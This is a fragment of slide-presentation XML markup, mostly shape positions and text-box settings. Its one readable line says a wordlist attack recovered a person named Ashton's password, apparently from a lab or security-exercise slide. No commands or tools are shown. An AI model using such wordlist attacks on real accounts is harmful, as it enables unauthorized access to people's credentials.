            <a:off x="2428500" y="14213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2" name="Google Shape;112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050" y="1085725"/>
            <a:ext cx="4522950" cy="303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62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2428500" y="1421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used with a wordlist, was able to receive ashtons password.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1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